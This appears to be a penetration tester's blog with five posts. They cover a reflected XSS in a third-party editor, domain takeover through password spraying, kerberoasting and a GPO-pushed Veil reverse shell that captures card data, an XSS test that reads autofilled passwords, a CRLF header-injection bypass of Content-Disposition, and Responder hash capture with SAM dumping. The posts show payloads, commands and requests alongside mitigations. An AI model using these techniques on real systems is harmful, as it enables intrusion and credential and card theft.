
XSS Hunting

3 March 2020 at 08:55

This post documents one of my findings from a bug bounty program. The program had around 20 web applications in scope. Luckily the first application I chose was a treasure trove of bugs, so that kept me busy for a while. When I decided to move on, I picked another one at random, which was the organisation’s recruitment application.

I found a cross-site scripting (XSS) vulnerability via an HTML file upload, but unfortunately the program manager marked this as a duplicate. In case you’re not familiar with bug bounties, this is because another researcher had found and logged the vulnerability with the program manager before me, and only the first submission on any valid bug is considered for reward.

After sifting through the site a few times, it appeared that all the low hanging fruit had gone. Time to bring out the big guns.

Big Guns

This time it’s in the form of my new favourite fuzzer ffuf.

ffuf -w /usr/share/wordlists/dirb/big.txt -u https://rob-sec-1.com/FUZZ -o Ffuf/Recruitment.csv -X HEAD -of csv

This is like the directory fuzzers of old, such as dirb and DirBuster; however, it is written in Go, which makes it much faster.

What this tool will do is try to enumerate different directories within the application, replacing FUZZ with items from the big.txt list of words. If we sneak a peek at a sample of this file:

$ shuf -n 10 /usr/share/wordlists/dirb/big.txt
odds
papers
diamonds
beispiel
comunidades
webmilesde
java-plugin
65
luntan
oldshop

…ffuf will try URL paths such as https://rob-sec-1.com/odds, https://rob-sec-1.com/papers, https://rob-sec-1.com/diamonds, etc., and report on what it finds. The -X parameter tells it to use the HEAD HTTP method, which will only retrieve HTTP headers from the target site rather than full pages. Usually retrieving HEAD will be enough to determine whether that hidden page exists or not.

The thing I like most about ffuf is the auto calibrate option, which determines "what is normal" for an application to return. I've not used this option here, but if you pass the -ac parameter (I don't recommend this with -X HEAD), it will grab a few random URL paths of its own to see if the application follows the web standard of returning HTTP 404 errors for non-existent pages, or whether it returns something else. In the latter case, if something non-standard is returned, ffuf will often determine what makes this response unique, and tune its engine to only output results that differ from the norm, and are thus worthy of investigation. This uses page response size as one of the factors, which is why I don't recommend combining it with -X HEAD: a HEAD response returns neither the body nor its size, so auto calibration would be heavily restricted.
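The auto-calibration idea can be sketched in a few lines of Python. This is a simplified illustration of the concept, not ffuf's actual implementation: request a few deliberately random paths to establish a "not found" baseline, then only report hits that deviate from it.

```python
import random
import string

def baseline_signature(fetch):
    """Request a few random, almost-certainly-nonexistent paths and
    record the (status, length) pairs the app returns for 'not found'."""
    sigs = set()
    for _ in range(3):
        path = ''.join(random.choices(string.ascii_lowercase, k=16))
        status, body = fetch('/' + path)
        sigs.add((status, len(body)))
    return sigs

def interesting(fetch, path, sigs):
    """A hit is only worth reporting if it differs from the baseline."""
    status, body = fetch(path)
    return (status, len(body)) not in sigs

# A fake target: everything returns the same custom 404 page except /admin.
def fake_fetch(path):
    if path == '/admin':
        return 200, '<html>admin panel</html>'
    return 404, '<html>custom not found page</html>'

sigs = baseline_signature(fake_fetch)
print(interesting(fake_fetch, '/admin', sigs))    # True
print(interesting(fake_fetch, '/nothere', sigs))  # False
```

Note that the baseline relies on body length, which is exactly why -X HEAD (no body) cripples it.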

Anyway, back to the application. Ffuf running:

Ffuf running

Running the above generated the following CSV that we can read from the Linux terminal using the column command:

column -s, -t Ffuf/Recruitment.csv

Ffuf output

The result I have highlighted above jumped out at me. Third party tools deployed to a web application can be a huge source of vulnerabilities, as the code can often be dropped in without review, and as it is working, tends to get forgotten about and never updated. A quick Google revealed that this was in fact from a software package called ZeroEditor, and was probably not just a directory made on the site:

Google

Note that, as usual, I have anonymised and recreated the details of the application, the third party software, and the vulnerability in my lab. Details have been changed to protect the vulnerable. If you Google this you won’t find an ASP.NET HTML editor as the first result, and my post has nothing to do with the websites and applications that are returned.

From the third party vendor’s website I downloaded the source code that was available in a zip, and then used the following command to turn the installation directory structure into my own custom wordlist:

find . -type f > ../WebApp/ZeroEditor-Fuzz-All.txt

In this file I noticed lots of “non-dangerous” file types such as those in the “Images” directory, so I filtered this like so:

cat ZeroEditor-Fuzz-All.txt | grep -v 'Images' > ZeroEditor-Fuzz-No-Images.txt

Now we can see the top few lines from the non-filtered, and the filtered custom word lists for this editor:

Filter

Now we can run ffuf again, this time using the custom word list we made:

ffuf -w ZeroEditor-Fuzz-No-Images.txt -u https://rob-sec-1.com/ZeroEditor/FUZZ -o Ffuf/Recruitment-ZeroEditor-Fuzz.csv -X HEAD -of csv -H 'User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0' -t 1

This time we are only running one thread (-t 1), as from our earlier fuzzing we can tell the web app or its server isn't really up to much performance-wise, so in this instance we are happy to go slow.

Ffuf with Custom List

and we can show in columns as before:

Ffuf columns with Custom List

My attention was drawn to the last two results. An ASPX - could there be something juicy in there? Also a Shockwave Flash file. I did actually decompile the latter, but it turned out just to be a standard Google video player, and I couldn’t find any XSS or anything else that interesting in the code.

Going back to Spell-Check-Dialog.aspx. What could we do here, with this discovered file?

Loading the page directly gave the following:

Spellchecker Page

Initially my go-to would have been param-miner, which can find hidden parameters, like I did here using wfuzz. The difference is that param-miner is faster, as it will try multiple parameters at once by employing a binary search, and it will also use an algorithmic approach to detect differences in content without you having to specify the baseline (similar to ffuf in this regard).

But we don't need to do that, as I already have the source code! I could do a code analysis to look for vulnerabilities myself.

Examining the code I found the following that reflected a parameter:

<asp:panel id="DialogFrame" runat="server" visible="False" enableviewstate="False">
            <iframe id="SpellFrame" name="SpellFrame" src="Spell-Check-Dialog.aspx?ZELanguage=<%=Request.Params["ZELanguage"]%>" frameborder="0" width="500" scrolling="no" height="340" style="width:500;height:340"></iframe>
        </asp:panel>

That is, the code <%=Request.Params["ZELanguage"]%> outputs ZELanguage from the query string or POST data without doing the thing that mitigates cross-site scripting: output encoding.

However, when I went ahead and passed the query string for ZELanguage, nothing happened:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?ZELanguage=FOOBAR

No XSS

I guessed this could be due to the default visible="False" in the above asp:panel tag. After further examination I found the code to make DialogFrame visible:

  void Page_Init(object sender, EventArgs e)
  {
      // show iframe when needed for MD support
      if (Request.Params["MD"] != null)
      {
          this.DialogFrame.Visible = true;
          return;
      }
      // …
  }

In summary, it looked like I just needed to set MD to something as well. Hence from the hidden page I found the two hidden query string parameters: MD=true&ZELanguage=FOOBAR.

And reviewing the code to find out how it worked enabled me to construct the new query string:

https://rob-sec-1.com/ZeroEditor/Spell-Check-Dialog.aspx?MD=true&ZELanguage=FOOBAR"></iframe><script>alert(321)</script>

Bingo, XSS:

XSS

This would have been mitigated if the vendor had encoded on output: <%=Server.HtmlEncode(Request.Params["ZELanguage"])%>
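The effect of output encoding can be demonstrated in Python, using the standard library's html.escape as a stand-in for ASP.NET's encoder: once the payload is encoded, the quote and angle brackets can no longer break out of the attribute.

```python
from html import escape

payload = 'FOOBAR"></iframe><script>alert(321)</script>'

# Unencoded: the payload closes the src attribute and injects script.
unsafe = f'<iframe src="Spell-Check-Dialog.aspx?ZELanguage={payload}">'

# Encoded: ", < and > become HTML entities, so the markup stays intact.
safe = f'<iframe src="Spell-Check-Dialog.aspx?ZELanguage={escape(payload)}">'

print('<script>' in unsafe)  # True
print('<script>' in safe)    # False
print(escape(payload))
```

The encoded output renders as harmless text instead of being parsed as new tags.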

There was another file in the downloaded zip that, if present, could possibly have allowed Server-Side Request Forgery (SSRF) or directory traversal; however, this was not found during fuzzing of the target, suggesting it had been deleted after deployment. There were also some directory manipulation pieces of code within Spell-Check-Dialog.aspx that take user input as part of a path; however, they don't appear to do anything too crazy with the file, and a static file extension is appended, making them of limited use. That leaves us with XSS for now. Although I have found some juicier findings on the bug bounty program, they are more difficult to recreate in a lab environment; it would be nice to release them should the program manager's client allow this in future.

Timeline

  • 27 December 2019: Reported to the program manager.
  • 29 December 2019: Triaged by the program manager.
  • 03 March 2020: Reported to vendor of HTML Editor as it occurred to me to check whether the latest version was vulnerable when writing this post. A cursory glance suggested it was. No details of any vulnerable targets disclosed to vendor, as the code itself is vulnerable.
  • 28 April 2020: Rewarded $400 from bug bounty program.
  • TBA: Response from vendor.
  • 19 May 2020: Post last updated.

Gaining Access to Card Data Using the Windows Domain to Bypass Firewalls

24 April 2019 at 20:02

This post details how to bypass firewalls to gain access to the Cardholder Data Environment (or CDE, to use the parlance of our times). End goal: to extract credit card data.

Without intending to sound like a Payment Card Industry (PCI) auditor, credit card data should be kept secure on your network if you are storing, transmitting or processing it. Under the PCI Data Security Standard (PCI-DSS), cardholder data can be sent across your internal network, however, it is much less of a headache if you implement network segmentation. This means you won’t have to have the whole of your organisation in-scope for your PCI compliance. This can usually be achieved by firewalling the network ranges dealing with card data, the CDE, from the rest of your organisation’s network.

Hopefully, the above should outline the basics of a typical PCI setup in case you are not familiar. Now onto the fun stuff.

As usual, details have been changed here to protect client-confidential data. The company in question had a very large network, all on the standard 10.0.0.0/8 range. Cardholder data was on a separate 192.168.0.0/16 range, firewalled from the rest of the company. The CDE mostly consisted of call centre operatives taking telephone orders, and entering payment details into a form on an externally operated web application.

This was an internal penetration test, therefore we were connected to the company’s internal office network on the 10.0.0.0/8 range. Scanning the CDE from this network location with ping and port scans yielded no results:

no-ping

no-ports

The ping scan is basically the same as running the ping command, but nmap can scan a whole range in one run. The "hosts up" figure in the second command's output relates to the fact we've given nmap the -Pn argument to tell it not to ping first; nmap will therefore report all hosts in the range as "up" even though they might not be (an nmap quirk).

So unless there was a firewall rule bypass vulnerability, or a weak password for the firewall that could be guessed, going straight in through this route seemed unlikely. Therefore, the first step of the compromise was to concentrate on taking control of Active Directory by gaining Domain Admin privileges.

Becoming Domain Admin

There are various ways to do this, such as this one in my previous post.

In this instance, kerberoasting was utilised to take control of the domain. A walkthrough of the attack follows, starting from an unauthenticated position on the domain.

The first step in compromising Active Directory usually involves gaining access to any user account, at any level. As long as it can authenticate to the domain controller in some way, we're good. In the Windows world, all accounts should be able to authenticate with the domain controller, even if they have no permissions to actually do anything on it: at the most basic level, even the lowest-privileged accounts need the domain controller to validate their password when the user logs in.

At this customer’s site, null sessions were enabled on the domain controller. In this case, our domain controller is 10.0.12.100, “PETER”. This allows the user list to be enumerated using tools like enum4linux, revealing the username of every user on the domain:

$ enum4linux -R 1000-50000 10.0.12.100 |tee enum4linux.txt

enum-started

enum-found

Now we have a user list, we can parse it into a usable format:

$ cat enum4linux.txt | grep '(Local User)' |awk '$2 ~ /MACFARLANE\\/ {print $2}'| grep -vP '^.*?\$$' | sed 's/MACFARLANE\\//g'
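The same extraction can be sketched in Python for anyone who finds the pipeline line-noisy. The sample lines below are made up for illustration, in the shape enum4linux prints them; the logic mirrors the grep/awk/sed chain: keep "(Local User)" lines, pull out the DOMAIN\username token, drop machine accounts (names ending in $), and strip the domain prefix.

```python
import re

def extract_users(enum_output, domain='MACFARLANE'):
    """Pull plain usernames out of enum4linux '(Local User)' lines,
    dropping machine accounts (names ending in $)."""
    users = []
    for line in enum_output.splitlines():
        if '(Local User)' not in line:
            continue
        m = re.search(re.escape(domain) + r'\\(\S+)', line)
        if m and not m.group(1).endswith('$'):
            users.append(m.group(1))
    return users

# Hypothetical sample in the same shape as the real output.
sample = """\
S-1-5-21-1-2-3-1105 MACFARLANE\\chuck (Local User)
S-1-5-21-1-2-3-1106 MACFARLANE\\WS01$ (Local User)
S-1-5-21-1-2-3-1107 MACFARLANE\\danny (Local User)
S-1-5-21-1-2-3-512 MACFARLANE\\Domain Admins (Domain Group)
"""
print(extract_users(sample))  # ['chuck', 'danny']
```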

enum-extracted-users

You may have noticed I’m not into the whole brevity thing. Yes, you can accomplish this with awk, grep, sed and/or even Perl with many fewer characters, however, if I’m on a penetration test I tend to just use whatever works and save my brain power for achieving the main goal. If I’m writing a script that I’m going to use long term, I may be tempted to optimise it a bit, but for pentesting I tend to bash out commands until I get what I need (pun intended).

Now on the actual test. The network is huge, with over 25,000 active users. However, in my lab network we only have a handful, which should make it easier to demonstrate the hack.

Now we have the user list parsed into a text file, we can then use a tool such as CrackMapExec to guess passwords. Here we will guess if any of the users have “Password1” as their password. Surprisingly enough, this meets the default complexity rules of Active Directory as it contains three out of the four character types (uppercase, lowercase and number).

$ cme smb 10.0.12.100 -u users.txt -p Password1

Wow we have a hit:

cme-password-found

Note that if we want to keep guessing and find all accounts, we can specify the --continue-on-success flag:

cme-continue

So we’ve gained control of a single account. Now we can query Active Directory and bring down a list of service accounts. Service accounts are user accounts that are for… well… services. Think of things like the Microsoft SQL Server. When running, this needs to run under the context of a user account. Active Directory’s Kerberos authentication system can be used to provide access, and therefore a “service ticket” is provided by Active Directory to allow users to authenticate to it. Kerberos authentication is outside the scope of this post, however, this is a great write-up if you want to learn more.

Anywho, by requesting the list of Kerberos service accounts from the domain controller, we also get a “service ticket” for each. This service ticket is encrypted using the password of the service account. So if we can crack it, we will be able to use that account, which is usually of high privilege. The Impacket toolset can be used to request these:

$ GetUserSPNs.py -outputfile SPNs.txt -request 'MACFARLANE.EXAMPLE.COM/chuck:Password1' -dc-ip 10.0.12.100

spns

As we can see, one of the accounts is a member of Domain Admins, so this would be a great password to crack.

$ hashcat -m 13100 --potfile-disable SPNs.txt /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

After running hashcat against it, it appears we have found the plaintext password:

spn-cracked

To confirm that this is an actual active account, we can use CrackMapExec again.

$ cme smb 10.0.12.100 -u redrum -p 'murder1!'

spn-user-da

Wahoo, the Pwn3d! shows we have administrator control over the domain controller.

da

OK, how to use it to get at that lovely card data?

Now, unfortunately for this company, the machines the call centre agents were using within the CDE to take phone orders were on this same Active Directory domain. And although we can’t connect to these machines directly, we can now tell the domain controller to get them to talk to us. To do this we need to dip into Group Policy Objects (GPOs). GPOs allow global, or departmental, settings to be applied to both user and computers. Well, it’s more than that really, however, for the purposes of this post you just need to know that it allows control of computers in the domain on a global or granular level.

Many of the functions of GPO are used to manage settings of the organisational IT, for example setting a password policy, or even setting which desktop icons appear for users (e.g. a shortcut to open the company's website). Another GPO allows "immediate scheduled tasks" to be run. This is what we're doing here: creating a script which will run in the call centre and connect back to our machine, giving us control. Here are the steps to accomplish this:

  1. Generate a payload. Here we’re using Veil Evasion. Our IP address is 10.0.12.1, so we’ll point the payload to connect back to us at this address.
    $ veil -t EVASION -p 22 --ip 10.0.12.1 --port 8755 -o pci_shell

  2. Login to the domain controller over Remote Desktop Protocol (RDP), using the credentials we have from kerberoasting.
    rdp

  3. Find the CDE in Active Directory. From our knowledge of the organisation, we know that the call centre agents work on floor 2. We notice Active Directory Users and Computers (ADUC) has an OU of this name:
    aduc-floor2

  4. Drop in the script we made from Veil into a folder, and share this on the domain controller. Set permissions on both the share and the directory to allow all domain users to read.
    dc-share

  5. Within GPO, we create a policy at this level:
    gpo-1

  6. Find the Scheduled Tasks option while editing this new GPO, and create a new Immediate Scheduled Task:
    gpo-2

  7. Create the task to point to the version saved in the share. Also set “Run in logged-on user’s security context” under “common”.
    task

Done!

I waited 15 minutes and nothing happened. I know that group policy can take 90 minutes, plus or minus 30, to update, but I was thinking that at least one machine would have got the new policy by now (note: if testing this in a lab you can use gpupdate /force). Then I waited another five. I was just about to give up and change tack, then this happened:

meterpreter-opened

Running the command to take a screenshot returned exactly what the call centre agent was entering at the time… card data!

card-data

Card data was compromised, and the goal of the 11.3 PCI penetration test was accomplished.

goal

If we have a look at the session list, we can see that the originating IP is from the 192.168.0.0/16 CDE range:

metasploit-sessions

On the actual test the shells just kept coming, as the whole of the second floor sent a shell back: something in the region of 60 to 100 Meterpreter sessions were opened.

Note that Amazon is used in my screenshot, which has nothing to do with the organisation I'm talking about. In the real test, a script was set up to capture a screenshot upon a shell connecting (via autorunscript), so we could concentrate on the more interesting sessions, such as those that were part way through the process and about to reach the card data entry phase.

There are other ways of getting screenshots, such as use espia in Meterpreter, and Metasploit's post/windows/gather/screen_spy.

There are methods of doing the GPO step programmatically, which I have not yet tried, such as New-GPOImmediateTask in PowerView.

The mitigation for this would be to always run the CDE on its own separate Active Directory domain; note that a separate domain in the same forest is not enough. Of course, defence-in-depth measures such as turning off null sessions, encouraging users to select strong passwords and making sure that any service accounts have crazy long passwords (20+ characters, completely random) are all good. Detecting any user that requests all service tickets in one go, or creating a honeypot service account that raises an alert if anyone requests its service ticket, could help too. There's no point keeping cardholder data segregated if a hacker can reach it from the rest of your organisation.

Password Autocomplete and Modern Browsers

8 July 2018 at 16:26

On many penetration test reports (including mine), the following is reported:


Password Field With Autocomplete Enabled

The page contains a form with the following action URL:

https://rob-sec-1.com/blog/autocomplete.php

The form contains the following password field with autocomplete enabled:

password

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application. The stored credentials can be captured by an attacker that gains control over the user’s computer. Further, an attacker that finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user’s browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields). Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.



Now this one is an awkward one to report, because saving passwords for the user is a good thing. MDN says on the matter:

in-browser password management is generally seen as a net gain for security. Since users do not have to remember passwords that the browser stores for them, they are able to choose stronger passwords than they would otherwise.

I completely agree with this. Password managers (even browser built-in ones) are better than using the same passwords across all sites, or subtle variations on one (monkey1Facebook, monkey1Twitter, etc.).

Users should have their local devices protected (by this I mean mobile devices and desktop machines). This means a password, PIN or fingerprint or equivalent to login, and encryption enabled (FDE, like BitLocker, or device enabled, like Android encryption), to prevent anything being extracted from the file system.

Therefore, the browser storing the password for the user's own use is of very little risk. The main risk here is what the Burp description of the vulnerability touches upon above:

cross-site scripting [XSS] may be able to exploit this to retrieve a user’s browser-stored credentials.

Yikes! So XSS could grab the credentials from your browser. To find out whether your browser is vulnerable, I’ve setup a test.

Login to your password manager, click the following link and then enter username: admin and password: secretPassword and when your browser asks you to save your password, do it. Go!

Then try the next link preloaded with this juicy XSS payload

<script>
document.body.onload = setTimeout(
    function() {
        alert(document.getElementById('password').value)
    },
    1000)
</script>

The one second delay is to give the browser time to complete the form. However, this can be altered with the delay parameter in case your browser needs longer.

Test

So if an alert box is shown with your password, your browser or password manager is vulnerable. In a real attack there will be no alert box, the attacker sends the password (and of course, username using the same method) cross-domain to their site like this (open dev tools or Burp to see the background request).

The next link has autocomplete off. There are two tests you can do here.

  1. Find out whether your password is still completed from before. Many modern browsers ignore the autocomplete directive.
  2. Don’t do this test yet, but if you try a new login (e.g. root and pass), see whether your browser prompts you to save.

Autocomplete Off

The second test may prevent your browser from auto-filling anything in future on this domain without you manually clicking (as you now have two possible logins to the site). Delete one of the logins from your browser/manager if you tried this test.

If your browser still autocompletes, this shows that setting autocomplete=off is pretty pointless for users with the same browser and password manager combination.

Attacker Injected Form

If autocomplete=off made a difference in the test above, then the point of my post is to show you whether an attacker-injected form could re-enable autocomplete and then capture your credentials, should a cross-site scripting vulnerability exist on the site and you were unlucky enough to follow an attacker-controlled link.

Before starting, make sure you only have one login saved. See the following guide on how to delete passwords if you tried the second test above. Click this link then your browser version and click back to return to this site: How to delete passwords.

This one has autocomplete off, however, an attacker injects their own form tag via the XSS vector, with autocomplete on to try and grab the password from it:

Attacker Injected Form

This works by closing the original form in the HTML, and then opening another one without autocomplete disabled before injecting the script:

</form><form><script...

If this test worked, but the second test didn't, then removing autocomplete from a form is like closing the stable door after the horse has bolted: the password has already been saved, and any future XSS attack can grab it.

Firefox 61, Edge 42 and IE 11 appear to be vulnerable, so if you have cross-site scripting on your site and a user has saved passwords, then the attacker can trivially grab the login details should their XSS link be followed. Chrome 67 appears to pre-fill the password, however, the script alert is empty, suggesting that Chrome has some clever logic built-in preventing script from retrieving it. I wonder if there’s a way around this for an attacker…? Maybe an idea for a future post.

The solution to this would be to use a password manager that requires the user to click before completing the password. This would stop a cross-site scripting attack from sending the password to the attacker automatically. Of course, if the user proceeded to log in, the cross-site scripting could have attached an event handler to the password field in order to send the password once it had been entered. Changing your password manager will, however, guard against completely automated attacks that require no further user interaction.

So to avoid being a victim yourself:

  • If the “attacker injected form” test gets your password, switch to a password manager that requires you to click before completing your login details.
  • For sensitive sites, bookmark the logon page and always follow your bookmark when logging in, never follow links from emails, other sites or from messages.

From a pentesting perspective it looks like we’re stuck reporting it, especially for PCI tests:

there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

So to sum up, password managers are great and increase overall security. However, if they complete forms without asking, they make an attacker’s work easy.

Defeating Content-Disposition

16 April 2018 at 23:00

The Content-Disposition response header tells the browser to download a file rather than displaying it in the browser window.

Content-Disposition: attachment; filename="filename.jpg"

For example, even though this HTML outputs <script>alert(document.domain)</script>, because of the header telling the browser to download, it means that no Same Origin Policy bypass is achieved:

Save As

This is a great mitigation for cross-site scripting where users are allowed to upload their own files to the system. HTML files are the greatest threat: a user uploading an HTML file containing script can instantly refer others to the download link. If the browser does not force the content to download, the script will execute in the context of the download URL's domain, giving the uploader access to the client side of the victim's session (the victim being the one that clicked the link). Of course, you could serve any downloads from another domain; however, if only authorised users should have access to the file then this means implementing some cross-domain authentication system, which could be prone to security flaws in its own right. Note that ideally (from the attacker's perspective), any uploads should be downloadable by other users, or should at least be shareable, otherwise we are only in self-XSS territory, which in my opinion is a non-vuln.
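As a minimal illustration of the mitigation (a hypothetical Python handler, nothing to do with the app under test), here a stored HTML upload is served with the Content-Disposition header, so a browser would download the script rather than execute it:

```python
import http.server
import threading
import urllib.request

class UploadHandler(http.server.BaseHTTPRequestHandler):
    """Serve a stored user upload, forcing a download instead of
    letting the browser render (and execute) the HTML."""
    UPLOAD = b'<script>alert(document.domain)</script>'

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-Type', 'text/html')
        # The crucial header: rendering is suppressed, SOP stays intact.
        self.send_header('Content-Disposition',
                         'attachment; filename="upload.htm"')
        self.send_header('Content-Length', str(len(self.UPLOAD)))
        self.end_headers()
        self.wfile.write(self.UPLOAD)

    def log_message(self, *args):  # keep the demo quiet
        pass

server = http.server.HTTPServer(('127.0.0.1', 0), UploadHandler)
threading.Thread(target=server.serve_forever, daemon=True).start()

url = f'http://127.0.0.1:{server.server_port}/upload.htm'
with urllib.request.urlopen(url) as resp:
    disposition = resp.headers['Content-Disposition']
print(disposition)  # attachment; filename="upload.htm"

server.shutdown()
```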

As well as the obvious HTML, there are also ways to bypass the SOP by uploading Flash or a PDF and then embedding the upload on the attacker’s page.

So… can Content-Disposition be bypassed? There were a few old methods that relied on either Internet Explorer caching bugs or Firefox bugs:

(Links stolen from here.)

Well on a recent pentest, I found another way. Admittedly, this was unique to the application, however, I’m sure it will not be the only one vulnerable in this way.

The application in question included a page designer, and the page designer widget allowed images to be uploaded to be included in the page. Upload functionality can be a gold mine for pentesters, so I immediately got testing it. Unfortunately, trying to upload a file of type text/html gave a 400 Bad Request. In fact, trying to upload anything except images gave the same response. Even when the client gave me access to the source code, I validated it and the code appeared sound - only allowing uploads of a white-list of allowed types.

If a file was uploaded, it was downloaded by the browser in a response that included the content-disposition header:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:19:25 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: image/png
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=foobar.png
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, what the client appeared to have forgotten was that there was a back-end API service, and that normal users could authenticate to this service by passing in their app username and password into a basic auth header.

This header is a request header and is in the following format:

Authorization: <type> <credentials>

In the basic mode this is:

Authorization: basic base64(username:password)

So to demonstrate, you can use an online tool such as this one. If your username is foo and your password is bar you would pass in the following header:

Authorization: basic Zm9vOmJhcg==

This is foo:bar base64’d.
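You can build (or verify) the header value with a couple of lines of Python using the standard library:

```python
import base64

def basic_auth(username, password):
    """Return the value for an HTTP Basic Authorization header."""
    token = base64.b64encode(f'{username}:{password}'.encode()).decode()
    return f'basic {token}'

print(basic_auth('foo', 'bar'))  # basic Zm9vOmJhcg==
```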

Passing this to the API, which was publicly available but ran on port 8875, allowed access to its functions as the authenticated user.

The first flaw I found was that the API allowed any content-type to be uploaded, even those that were disallowed when using the web UI:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg==
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html"}

Obviously, this is simplified and anonymised from the original app. Anyway, this gave the following HTTP response:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788421"}

Requesting the file actually returned the content-type:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:24:11 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, that pesky content-disposition was preventing us from gaining XSS.

What I next tried was setting the type to text/html\r\nfoo:bar, thinking that this would not work. However, it uploaded fine, and upon requesting the download I got the injected header returned:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:44:35 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
foo:bar
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Interesting… My first go at bypassing content-disposition was to inject another content-disposition header, hoping the browser would act on the first one:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 15:45:52 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html
content-disposition: inline
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

However, the browser flagged this with the following error, which I’ve never seen the likes of before:

Duplicate Content-Disposition

After a bit of thought, I came up with the following payload instead:

POST /store/data/files HTTP/1.1
Host: 10.10.65.26:8875
Content-Length: 453
Content-Type: application/json
User-Agent: curl
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Authorization: basic Zm9vOmJhcg==
Accept: */*

{"name": "xss.htm", "data": "PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+", "type": "text/html\r\n\r\n"}

This gave me the ID as before:

HTTP/1.1 201 Created
<snip>
{"_key":"10000006788444"}

And requesting

https://10.10.65.26/en-GB/files/10000006788444/download

gave the XSS:

HTTP/1.1 200 OK
Date: Mon, 16 Apr 2018 17:34:21 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Content-Type: text/html

Cache-Control: no-store, no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
Content-Length: 39
Vary: *
Connection: Close
content-disposition: attachment;filename=xss.htm
X-Frame-Options: SAMEORIGIN

<script>alert(document.domain)</script>

Alert

This is due to the injected carriage return and line feed, which cause the browser to interpret the second (original) content-disposition header as part of the HTTP body, where it is ignored rather than acted upon as a directive to download. Of course, this does need some social engineering, as you would require your victim to follow the link to the downloaded file to trigger the JavaScript in their login context.

Gaining Domain Admin from Outside Active Directory

4 March 2018 at 11:06

…or why you should ensure all Windows machines are domain joined.

This is my first non-web post on my blog. I’m traditionally a web developer, and that is where my first interest in infosec came from. However, since I have managed to branch into penetration testing, initially part time and now full time, Active Directory testing has become my favourite type of penetration test.

This post is regarding an internal network test for a client I did earlier in the year. This client’s network is a tough nut to crack, and one I’ve tested before so I was kind of apprehensive of going back to do this test for them in case I came away without having “hacked in”. We had only just managed it the previous time.

The first thing I run on an internal is the Responder tool. This will grab Windows hashes from LLMNR or NetBIOS requests on the local subnet. However, this client was wise to this and had LLMNR & NetBIOS requests disabled. Despite already knowing this fact from the previous engagement, one of the things I learned during my OSCP course was to always try the easy things first - there’s no point in breaking in through a skylight if the front door is open.

So I ran Responder, and I was surprised to see the following hash captured:

responder

Note of course, that I would never reveal client confidential information on my blog, therefore everything you see here is anonymised and recreated in the lab with details changed.

Here we can see the host 172.16.157.133 has sent us the NETNTLMv2 hash for the account FRONTDESK.

Checking this host’s NetBIOS information with Crack Map Exec (other tools are available), we can check whether this is a local account hash. If it is, the “domain” part of the username:

[SMBv2] NTLMv2-SSP Username : 2-FD-87622\FRONTDESK

i.e. 2-FD-87622 should match the host’s NetBIOS name if this is the case. Looking up the IP with CME we can see the name of the host matches:

netbios

So the next port of call was to try to crack this hash and gain the plaintext password. Hashcat was loaded against rockyou.txt and rules, and quickly cracked the password.

hashcat -m 5600 responder /usr/share/wordlists/rockyou.txt -r /usr/share/rules/d3adhob0.rule

hashcat

Now we have a set of credentials for the front desk machine. Hitting the machine again with CME but this time passing the cracked credentials:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth

admin on own machine

We can see Pwn3d! in the output showing us this is a local administrator account. This means we have the privileges required to dump the local password hashes:

cme smb 172.16.157.133 -u FRONTDESK -p 'Winter2018!' --local-auth --sam

SAM hashes

Note we can see

FRONTDESK:1002:aad3b435b51404eeaad3b435b51404ee:eb6538aa406cfad09403d3bb1f94785f:::

This time we are seeing the NTLM hash of the password, rather than the NETNTLMv2 “challenge/response” hash that Responder caught earlier. Responder catches hashes over the wire, and these are different to the format that Windows stores in the SAM.
